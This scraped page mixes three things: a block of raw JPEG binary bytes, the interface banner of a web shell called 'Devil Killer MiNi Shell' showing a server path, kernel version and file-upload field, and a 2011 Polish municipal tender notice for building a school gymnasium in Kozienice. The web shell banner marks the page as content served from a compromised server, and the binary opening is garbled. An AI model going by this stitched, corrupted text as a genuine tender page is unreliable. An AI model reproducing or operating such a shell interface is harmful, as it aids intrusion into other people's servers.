JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110504/98686-N-2011.html

<p class="kh_header"><b>Kozienice: Budowa sali gimnastycznej przy PSP Nr 1 w Kozienicach</b><br>
<b>Numer ogłoszenia: 98686 - 2011; data zamieszczenia: 04.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sali gimnastycznej przy PSP Nr 1 w Kozienicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest:
-   budowa sali gimnastycznej przy PSP nr 1 w Kozienicach wraz z łącznikiem. Obiekt składa się z części sportowej, socjalnej i łącznika. Sala sportowa  wraz z  częścią zaplecza socjalnego stanowi jednokondygnacyjny budynek halowy z dachem łukowym. Długość sali sportowej wynosi 28,89 m, szerokość 28,18m, wysokość 11,85m. Pozostała część socjalna ma nieregularną formę o długości 33,11m, szer.12,69 m i wysokości 5,47 m - jest budynkiem parterowym, niepodpiwniczonym z dachem dwuspadowym. W części socjalnej i łączniku na parterze znajdują się: korytarz, portiernia, węzły sanitarne,  pokój nauczycielski,  biblioteka, umywalnie damskie i męskie, siłownia, szatnie, gabinet pielęgniarski, pomieszczenie gospodarcze, magazyny. Na piętrze są: hall, sale dydaktyczne, magazyny, szatnie, umywalnia  damska i męska, węzeł cieplny.
Konstrukcja budynku mieszana - murowana z elementami żelbetowymi monolitycznymi w ścianach (słupy, belki, wieńce). Konstrukcja dachu z dźwigarów z drewna klejonego, zabezpieczonego w sposób chemiczny i mechaniczny. Obiekt posadowiony na stopach i ławach fundamwntowych. Łącznik jest w konstrukcji tradycyjnej murowanej   z rdzeniem żelbetowym w ścianach. Dach nad łącznikiem w konstrukcji drewnianej, dach przykryty płytami warstwowymi wykończonymi membraną. Obiekt wyposażony w instalacje: 
-	wentylacyjno - grzewczą, 
-	elektryczną, 
-	odgromową i uziemiającą,
-	wodną - zimnej i ciepłej wody użytkowej, 
-	kan. sanitarnej i deszczową, 
-	p.poż. ,
-	bezpieczeństwa,
-	przeciwporażeniową,
-	monitoringu wizyjnego CCTV,
-	SSWiN (ochrona elektroniczna obiektu),
-	przywoławczą,
-	internetową,
-	TV,
-	sprzęt podręczny,
- wykonanie dojść (chodników oraz  opasek) i dojazdów (parkingów i drogi dojazdowej) do obiektu,
- przygotowanie oraz założenie trawników i wysadzenie drzew i krzewów,
- budowa ogrodzenie,
- wyposażenie obiektu w  fabrycznie nowe urządzenia,
-  wyposażenie  terenu wokół obiektu w  fabrycznie nowe ławki, kosze, stojaki na rowery,
- uzbrojenie terenu:
-	budowa przyłącza kanaliazacja deszczowa,
-	budowa przyłącza kanalizacja sanitarna i przebudowa odcinka kanalizacji sanitarnej,
-	budowa przyłącza wodociągowego i przebudowa odcinka wodociągu,
-	budowa przyłącza cieplnego wraz z węzłem cieplnym.
Zakres rzeczowy obejmuje w szczególności:  
- roboty przygotowawcze,
- roboty rozbiórkowe, w tym rozbiórkę nawierzchni wraz z wywózką  gruzu, karczowaniem drzew i krzewów wraz z wywiezieniem  gałęzi i oczyszczeniem terenu,
- roboty ziemne ( wykopy i zasypywanie),
- fundamenty i elementy żelbetowe:
-	stopy i ławy fundamentowe wys. 70 cm z betonu C25-30,
-	słupy żelbetowe ,
-	ściany fundamentowe z bloczków betonowych ,
-	płyty żelbetowe stropowe,
-	belki i podciągi żelbetowe z betonu C25-30,
-	schody żelbetowe,
- izolację fundamentów,
- roboty murowe ścian wraz z montażem nadproży,
- stropy i dachy:
	sala:
-	montaż dźwigarów dachowych i płatwi z drewna klejonego, 
-	płyta dachowa z rdzeniem  z pianki poliuretanowej wraz z powłoką ze satli ocynkowanej,
-	ołacenie połaci dachowych wraz z ułożeniem folii wiatroszczelnej, izolacji cieplnej i akustycznej, folii paroizolacyjnej, 
-	wykonanie podbitki,
-	montaż rynien i rur spustowych,
   część zaplecza wraz z łącznikiem:
	            -      montaż płyt stopowych kanałowych,
-	montaż płyt dachowych trapezowych wraz z wykończeniem pokrycia dachowego,
-	ołacenie połaci dochowych wraz z ułożeniem folii wysokoparaprzepuszczalnej,
-	montaż konstrukcji dachu: krokwi, kleszczy, murłat, słupków, 
-	podbitka  z płyty OSB,
-	izolacja cieplan i akustyczna,
-	folia poroizolacyjna,
-	montaż rynien, rur spustowych i obróbek blacharskich,
- wykonanie posadzek:
-	w sali gimanastycznej typu sportowego,
-	w pomieszczeniach magazynowych, technicznych i widowni ,
- elewacje:
-	montaż stolarki okiennej i drzwiowej ,
-	montaż parapetów zewnętrznych i wewnętrznych, 
-	wykonanie ocieplenia, 
-	tynk zewnętrzny akrylowy  cienkowarstwowy,
-	montaż zadaszenia, balustrad i drabin, 
- roboty wykończeniowe:
		sala:
-	tynk cem.-wap.i gładź gipsowa ścian,
-	malowanie ścian i lamperi  z przygotowaniem podłoża,
-	montaż drzwi wewnętrznych,
-	montaż balustardy widowni,
-	
część socjalna i łącznik:
-	tynk cem. - wap. i gładź gipsowa,
-	wykonanie scian z luksferów,
-	malowanie tynków,
-	montaż stolarka drzwiowa,
-	montaż sufitu podwieszonego,
-	licowanie scian płytkami,
-	montaż platformy dla osoby niepełnosprawnej,
-	montaż boksów WC,
-	montaż kabin prysznicowych,
- zagospodarowanie terenu:
-	wykonanie chodnika i opaski (nawierzchnia z  kostki betonowej),
-	wykonanie wjazdu,
-	wykonanie placów i zatoki postojowej (nawierzchnia z  kostki betonowej),
-	montaż bram wjazdowych i furtek,
-	wykonanie ogrodzenia z cegły klinkierowej z przęsłami stalowymi,
-	wykonanie trawników,
-	sadzenie drzew i krzewów,
-	montaż ławek, koszy na śmieci,
- zakup wraz z dostawą i montażem wyposażenie obiektu  w fabrycznie nowe urządzenia(w tym boiska głównego, boisk treningowych, boiska głównego  do siatkówki, boiska do piłki ręcznej oraz zaplecza),
- budowa odcinka kanalizacji deszczowej,
- budowa i porzebudowa odcinka kanalizacji sanitarnej,
- budowa i przebudowa przyłącza wodociągowego,
- budowa oraz przekładka sieci ciepłowniczej wraz z węzłem ciepłowniczym,
- budowa zasilania obiektu w energię elektryczną, w tym oświetlenia zewnętrznego,
- budowa wenętrznej instalacji elektrycznej,
- budowa instalacji odgromowej i uziemiającej,
- ochrona przeciwporażeniowa obiektu,
- budowa instalacji wodociągowej, kanalizacji sanitarnej, grzewczej, wentylacyjnej, 
- budowa instalacji CCTV (system monitoringu wizyjnego), 
- budowa instalacji SSWiN (ochrona elektroniczna obiektu),
- budowa instalacji przywoławczej ,
- budowa instalacji internetowej,
- budowa instalacji TV ,
- kompleksową obsługę geodezyjną zachowując postanowienia  Roz.M.G.P.iB. z dn.21.02.1995r (Dz. U. nr 25 poz.133) w sprawie  rodzaju i zakresu  opracowań   geodezyjno-kartograficznych oraz czynności geodezyjnych   obowiązujących  w  budownictwie, w tym czynności geodezyjne obowiązujące w budownictwie, w tym:
-  prace    przygotowawcze   -   pomiary    uzupełniające   konieczne   do  realizacji   zadania,    
   domiary sytuacyjne, uściślenie  rzędnych wysokościowych ,
-  prace  pomiarowe  poparte  wpisami  w  dzienniku  budowy - wytyczenie  w  terenie  i   
   utrwalenie na gruncie  w  terminie  7  dni  od dnia przekazania  placu budowy potwierdzonego   
   wpisem w dzienniku  budowy   przebiegu   lokalizacji   obiektu  w szczególności:
¨	główne osie obiektu,
¨	charakterystyczne punkty,
¨	stałe punkty wysokościowe,
¨	brakujące uzupełnienia geodezyjne,
-	uczestniczenie w przekazaniu placu budowy i  odbiorach robót, w tym częściowych, końcowym, gwarancyjnych i pogwarancajnych,
-	bieżąca obsługa geodezyjna budowy, na każde żądanie Wykonawcy robót - pomiary realizacyjne, bilansy robót ,
-	na żądanie wykonawcy i inwestora kontrolne pomiary elementów inwestycji, w tym  przemieszczeń i odkształceń obiektów w terminach uzgodnionych z wykonawcą i zamawiającym,
-	potwierdzenie wpisem do dziennika budowy wykonania czynności geodezyjnych,
-	przekazanie kopii szkiców tyczenia i kontroli położenia elementów inwestycji, zawierające dane geodezyjne umożliwiające wznowienie lub kontrolę wyznaczenia - Zamawiającemu, Wykonawcy i Inspektorowi Nadzoru,
-	geodezyjna inwentaryzacja powykonawcza elementów inwestycji, wraz z podziałem szczegółowym na  rodzaj robót, średnice i ilości wykonanych robot w podziale na branże - wg wymagań inspektora nadzoru lub Zamawiającego,
-	powykonawcza dokumentacja geodezyjno - kartograficzna obiektów w formie i zakresie przewidzianym  wymaganymi przepisami obowiązującymi na dzień  odbioru zadania,
-	przekazanie zamawiającemu 5 kompletów  kopii mapy powstałej w wyniku geodezyjnej inwentaryzacji powykonawczej zarejestrowanej w Starostwie wraz z wykazem określającym  ilości wykonanych robót z podziałem na branże, rodzaje robót, średnice, 
-	współpraca z pozostałymi uczestnikami procesu budowlanego w tym z wykonawcą w zakresie przygotowania powykonawczej dokumentacji geodezyjnej dla zadania ,
-	wykonanie czynności geodezyjnych w okresie rękojmi i gwarancji dla robót budowlanych,
-	dyspozycyjność, w tym poprzez kontakt telefonii komórkowej,
- wykonanie robót pomocniczych, w tym:
.	konserwacja wbudowanych elementów zgodnie z zaleceniami producenta w okresie  rękojmi i gwarancji oraz instalacji (szczegółowe warunki  określa załącznik nr 2),
.	nieodpłatne bieżące przeglądy kończone protokołami na zasadach  zapewniajacych zamawiającemu maksymalne bezpieczeństwo podczas eksploatacji obiektu i usuwanie uszkodzeń wynikających z wad produkcyjnych lub zastosowania wadliwych materiałów, 
.	ogrodzenie, oznakowanie oraz zapewnienie stałego dozoru terenu oraz poniesienie kosztów związanych z oznakowaniem terenu budowy zgodnym z przepisami, 
.	opracowanie projektów organizacji ruchu na czas prowadzenia robót wraz z uzyskaniem wymaganych  zezwoleń, poniesienie kosztów związanych z zajęciem pasa drogowwgo oraz oznakowaniem ich na czas prowadzenia robót zgodnym z przepisami,
.	zabezpieczenie istniejących urządzeń kolidujących z zadaniem zgodnie z zaleceniami właścicieli sieci (w miejscach kolizji roboty ziemne wykonywać ręcznie), 
.	roboty prowadzić pod nadzorem właścicieli sieci,
.	przed włączeniem do sieci roboty podlegają odbiorowi przez właścicieli sieci i urządzeń, 
.	wywózka materiałów odpadowych (gruzu, gałęzi, karpin, dłużyc oraz innych) pochodzących z placu budowy  i ich utylizacja, zachowanie czystości dróg w czasie prowadzenia robót,
.	wykonanie przez uprawnione laboratoria  pomiarów i badań w czasie realizacji inwestycji, potwierdzających jakość wykonanych robót,
.	przejęcie na siebie odpowiedzialności za szkody wobec osób trzecich w  związku z prowadzonymi robotami, 
.	uporządkowanie terenu bezpośrednio przylegającego do placu budowy,
.	opracowanie i przekazanie zamawiającemu szczegółowych instrukcji obsługi wbudowanych systemów,
.	założenie książki eksploatacji systemów,
.	szkolenie dla użytkowników systemów i urządzeń,
.	przeprowadzenie rozruchu systemów i urządzeń zainstalowanych w ramach zadania,
.	wykonanie zgodnie z obowiązującymi przepisami wszelkich projektów warsztatowych, montażowych, technologicznych niezbędnych dla realizacji zamówienia oraz uzyskanie akceptacji Zamawiającego i Projektanta,
.	dokonanie niezbędnych w toku realizacji uzgodnień z właściwymi organami,
.	na żądanie Zamawiającego wynikające z art. 26 ustawy Prawo Budowlane przeprowadzenie na koszt Wykonawcy badań, które nie były przewidziane umową,
.	zawarcie umowy ubezpieczeniowej o odpowiedzialności cywilnej z tytułu szkód, które mogą zaistnieć w związku z okreslonymi zdarzeniami losowymi zgodnie z zapisami umowy,
.	sporządzenie i przekazanie Zamawiającemu po zrealizowaniu obiektu pełnej dokumentacji powykonawczej w 3-ch egz. ,
.	przekazanie Zamawiającemu kart gwarancyjnych zabudowanych urządzeń (w języku polskim),
.	uzyskanie w imieniu Zamawiającego pozwolenia na użytkowanie obiektu, w tym zawiadomienie zgodnie z właściwościami wynikającymi z przepisów szczególnych o zakończeniu budowy i zamiarze przystąpienia do jego użytkowania właściwych organów (art. 56 ustawy Pb),
- wymagane przez obowiązujące przepisy próby (w tym ciśnieniowe), badania, sprawdzanie, płuknie instalacji , pomiary (w tym rezystencji żył) sieci i instalacji,
- zapewnienie obsługi geologicznej w pełnym zakresie  przy pracach ziemnych i fundamentowych.

Zakres robót został szczegółowo określony w załączonym do siwz załączniku nr 9,10,11.
W ramach zadania wykonawca jest zobowiązany do wykonania robót pomocniczych, niezbędnych do wykonania i eksploatacji zadania, określonych w projekcie umowy stanowiącym załącznik nr  2 do siwz ,  w tym do :        
- wykonania robót towarzyszących związanych z inwestycją - robót  związanych z przygotowaniem placu budowy,  robót związanych z utrudnieniami wynikłymi w trakcie realizacji zadania - w przypadku wystąpienia  utrudnień   - ich likwidacja -demontaż  oraz  wykonania robót odtworzeniowych po likwidacji utrudnień - w tym urządzeń kolidujących  z przedmiotem umowy , uporządkowanie obszaru objętego robotami oraz sąsiadującego z pozostałości po prowadzonych robotach, na bieżąco porządkowanie  teren po  wykonanych  robotach , zabezpieczenia przed niekorzystnymi warunkami atmosferycznymi w sposób skuteczny obiektu wraz z jego poszczególnymi elementami, 

- wykonania przez uprawnione laboratoria  pomiarów i badań w czasie realizacji inwestycji, potwierdzających jakość wykonanych robót, zgodnie z wymaganiami stawianymi przez obowiązujące w dacie przyjęcia przedmiotu umowy normy  i  inne przepisy podmiotowe,

- prowadzenie robót w sposób nie kolidujący z funkcjonowaniem terenów sąsiadujących z inwestycją, 

- przez cały czas realizacji inwestycji właściwe oznakowanie prowadzonych robót, zgodnie z obowiązującymi przepisami.

Do obowiązku Wykonawcy należy: 
.	urządzenie i zabezpieczenie obszaru objętego robotami ponosząc koszty z tym związane -w tym zużycia   energii elektrycznej i wody, wykonania i utrzymania na swój koszt wszelkich osłon, ogrodzenia, oznakowania i innych usług które może potrzebować do wykonania robót objętych niniejszą umową, 
.	niezwłoczne wykonanie robót koniecznych ze względu na bezpieczeństwo  lub zabezpieczenie   przed awarią, 
.	prowadzenie robót w sposób nie powodujący zagrożenia bezpieczeństwa ludzi i mienia, nie  powodując   szkodliwych  zmian w środowisku naturalnym,
.	pełna odpowiedzialności za obszar objęty robotami z chwilą jego przejęcia,
.	przestrzeganie bezpieczeństwa wszelkich osób upoważnionych do przebywania na terenie budowy,
.	przyjęcie na siebie odpowiedzialności za szkody  wobec osób trzecich w związku z prowadzonymi robotami,  (ich zabezpieczenie, naprawa),
.	podejmowanie wszelkich środków zapobiegawczych wymaganych przez rzetelną praktykę budowlaną oraz aktualne okoliczności, aby zabezpieczyć prawa właścicieli posesji sąsiadujących z    terenem budowy,
.	zapoznanie się z umiejscowieniem wszystkich istniejących sieci przed rozpoczęciem jakichkolwiek wykopów lub innych prac mogących uszkodzić istniejące uzbrojenie,
.	zabezpieczenie teren budowy przejmując skutki finansowe z tego tytułu, w tym   zabezpieczenie  go pod względem bhp , wykonanie potrzebnych miejsc składowania materiałów  we własnym zakresie i na własny koszt, po zakończeniu robót uporządkowanie obszaru objętego robotami i terenu z nim bezpośrednio sąsiadującego oraz miejsc składowania. 
Uwaga: Wykonawca musi zwrócić szczególną  uwagę na bezpieczeństwo osób korzystających z obiektu i użyć do jego budowy oraz do wyposażenia  materiałów, które posiadają certyfikat na znak bezpieczeństwa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>zamawiajacy przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 ustawy PZP do wysokości 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.00.00-1, 45.22.35.00-1, 45.32.00.00-6, 45.26.25.22-6, 45.26.23.50-9, 45.26.10.00-4, 45.42.11.00-5, 45.32.10.00-3, 45.44.23.00-0, 45.11.12.91-4, 45.31.22.00-9, 45.31.20.00-7, 45.31.40.00-1, 45.33.22.00-5, 45.33.23.00-6, 45.32.10.00-3, 45.33.11.00-7, 45.44.22.00-9, 45.33.12.10-1, 45.31.51.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 100 000,00 zł PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał roboty budowlane polegające na budowie co najmniej jednego obiektu użyteczności publicznej, wyposażonego co najmniej w instalację wodociagową, kanalizacji sanitarnej, co oraz elektryczną, o kubaturze brutto tego budynku nie mniejszej niż 2600 m3  i załączy dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełnienia ww warunku dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać, że ww warunek wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje w okresie przewidzianym na realizację zamówienia co najmniej 1 osobą która będzie pełnić funkcję kierownika budowy , posiadającą uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednich przepisów obowiązujących na  terenie kraju z którego pochodzi dana osoba, które  w zakresie objetym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w ww. specjalności.
Ocena spełnienia ww warunku dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach. Z treści załączonych dokumentów musi wynikać, że w/w warunek wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
